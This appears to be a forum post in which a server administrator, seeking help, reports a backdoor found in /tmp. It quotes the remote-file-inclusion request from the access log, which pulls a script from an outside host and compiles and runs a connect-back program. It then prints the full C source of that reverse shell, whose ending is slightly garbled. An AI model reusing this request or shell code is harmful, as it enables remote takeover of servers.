Backdoor

Hi

today i have found a file in my tmp directory that i have make a snosuexec and nosuid i have also the compilers disable, how can i stop peoples to upload in the TMP folder?

they get access from:

"GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://exploit.webcindario.com/cse.gif?&cmd=cd%20/tmp/;gcc%20-o%20dc-connectback%20dc-connectback.c;./dc-connectback%20200.199.178.13%2080

Do you think that he have execute it?

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
char *host;
int port = 80;
int f;
int l;
int sock;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;
char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
"Issue \"export TERM=xterm; exec bash -i\"\n"
"For More Reliable Shell.\n"
"Issue \"unset HISTFILE; unset SAVEHIST\"\n"
"For Not Getting Logged.\n(;\n\n";
printf("Data Cha0s Connect Back Backdoor\n\n");
if (argc < 2 || argc > 3) {
printf("Usage: %s [Host] <port>\n", argv[0]);
return 1;
}
printf("[*] Dumping Arguments\n");
l = strlen(argv[1]);
if (l <= 0) {
printf("[-] Invalid Host Name\n");
return 1;
}
if (!(host = (char *) malloc(l))) {
printf("[-] Unable to Allocate Memory\n");
return 1;
}
strncpy(host, argv[1], l);
if (argc == 3) {
port = atoi(argv[2]);
if (port <= 0 || port > 65535) {
printf("[-] Invalid Port Number\n");
return 1;
}
}
printf("[*] Resolving Host Name\n");
he = gethostbyname(host);
if (he) {
memcpy(&ia.s_addr, he->h_addr, 4);
} else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
printf("[-] Unable to Resolve: %s\n", host);
return 1;
}
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(port);
printf("[*] Connecting...\n");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Socket Error\n");
return 1;
}
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
printf("[-] Unable to Connect\n");
return 1;
}
printf("[*] Spawning Shell\n");
f = fork( );
if (f < 0) {
printf("[-] Unable to Fork\n");
return 1;
} else if (!f) {
write(sock, msg, sizeof(msg));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl("/bin/sh", "shell", NULL);
close(sock);
return 0;
}
printf("[*] Detached\n\n");
}
printf("[*] Detached\n\n");
return 0;
}

 

 

 

 

Top